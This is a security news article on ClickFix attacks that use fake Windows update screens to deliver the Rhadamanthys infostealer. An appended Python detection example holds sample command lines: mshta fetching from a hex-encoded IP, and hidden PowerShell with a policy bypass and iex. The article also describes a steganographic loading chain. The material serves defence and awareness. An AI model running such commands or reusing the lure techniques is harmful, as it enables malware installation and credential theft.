ClickFix Attacks Surge: Fake Windows Updates Deliver Rhadamanthys Infostealer Globally
Fake Windows updates have entered a new cycle of ClickFix campaigns, according to researchers at Huntress. Attackers are increasingly replacing bot-check pages with full-screen blue windows that closely mimic the Windows update interface. As Microsoft has also stressed, ClickFix has become the most widespread method of initial access — a tactic now adopted by groups across a wide spectrum of skill levels.
The attacks begin when a victim visits a malicious site that forces the browser into full-screen mode and displays a page visually indistinguishable from a legitimate Windows update screen. The user is then urged to perform a “critical update” manually, following the classic ClickFix pattern: open the Run dialog with Win+R, paste a prepared command, and execute it. At that moment, the victim unknowingly triggers the malicious chain themselves.
The command launches mshta.exe with a URL whose second IP octet is always encoded in hexadecimal. PowerShell then retrieves a block of .NET code which, once decrypted, is loaded directly into memory and hands execution to the next stage. This next component is a .NET module responsible for covert malware delivery via steganography. It extracts an encrypted Donut shellcode payload from the pixel data of PNG files, using individual color channels to reconstruct the final malicious content — a technique that helps evade signature-based detection systems.
According to Huntress, between 29 September and 30 October 2025, the team investigated 76 incidents affecting organizations in the United States, across the EMEA region, and in APJ. One case involved traffic to 141.98.80[.]175. In every instance, the chain relied on URLs with hexadecimal second octets that pointed to the steganographic loader. Researchers found Russian-language comments in the source code of the spoofed update pages, though the campaign’s authors remain unidentified.
Despite the 13 November Operation Endgame actions targeting Rhadamanthys infrastructure, the fake-update sites continued to operate at least until 19 November. All identified lures referenced the same structure of hex-encoded URLs previously associated with Rhadamanthys delivery, even though the malware itself was no longer hosted there. Investigators warn, however, that the infrastructure may shift rapidly.
Both variants of the Windows-update lures ultimately delivered Rhadamanthys, a credential-stealing infostealer. To reduce the risk of such attacks, organizations are advised to block or restrict access to the Run dialog, educate employees about ClickFix-style social-engineering techniques, and remind them that no legitimate Windows update ever requires manually pasting commands. EDR-level defensive tools can also help detect cases where explorer.exe spawns mshta.exe, powershell.exe, or other executables with atypical parameters.
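To make the two detection points above concrete (a LOLBIN spawned by explorer.exe with atypical parameters, and a URL whose second IP octet is hex-encoded), here is an added example of rule logic run over constructed process-creation events. It is not code from Huntress or from the article; the events, rule names and the `ATYPICAL` keyword list are assumptions, and the hex-octet URL is modelled on the 141.98.80[.]175 address the article cites (0x62 is 98).

```python
import re

# Constructed process-creation events: (parent image, child image, command line).
SAMPLE_EVENTS = [
    ("explorer.exe", "mshta.exe", "mshta.exe http://141.0x62.80.175/update"),
    ("explorer.exe", "powershell.exe", "powershell.exe -w hidden -ep bypass -c iex(...)"),
    ("explorer.exe", "powershell.exe", "powershell.exe"),  # user opened a console: benign
    ("svchost.exe", "powershell.exe", "powershell.exe -File C:\\it\\inventory.ps1"),
]

LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "curl.exe"}
# http(s) URL whose host is a dotted IP with a hex-encoded SECOND octet.
HEX_OCTET_URL = re.compile(
    r"https?://(\d{1,3})\.(0x[0-9a-f]{1,2})\.(\d{1,3})\.(\d{1,3})", re.I)
# Command-line traits that make a LOLBIN launch from explorer.exe atypical (assumed list).
ATYPICAL = re.compile(
    r"https?://|-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|"
    r"-e(nc|ncodedcommand)\b|\biex\b|downloadstring", re.I)

def decode_hex_octet_host(cmdline):
    """Return the dotted-decimal form of a hex-second-octet host, or None."""
    m = HEX_OCTET_URL.search(cmdline)
    if not m:
        return None
    a, b, c, d = m.groups()
    return f"{a}.{int(b, 16)}.{c}.{d}"

def classify(parent, image, cmdline):
    """Names of the rules fired by one event (empty list means no rule matched)."""
    hits = []
    if parent.lower() == "explorer.exe" and image.lower() in LOLBINS \
            and ATYPICAL.search(cmdline):
        hits.append("explorer-spawns-lolbin-atypical")
    if decode_hex_octet_host(cmdline):
        hits.append("hex-second-octet-url")
    return hits

def scan(events):
    """Map each flagged command line to (rules fired, decoded host or None)."""
    return {c: (classify(p, i, c), decode_hex_octet_host(c))
            for p, i, c in events if classify(p, i, c)}

if __name__ == "__main__":
    for cmd, (rules, host) in scan(SAMPLE_EVENTS).items():
        print(f"{rules} host={host} :: {cmd}")
```

The decoded host gives an analyst the dotted-decimal address to pivot on, since proxy and DNS logs will not contain the `0x` form.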